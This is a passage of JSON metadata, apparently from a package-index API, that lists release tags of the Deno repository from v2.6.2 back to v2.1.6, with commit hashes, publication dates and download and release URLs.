.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01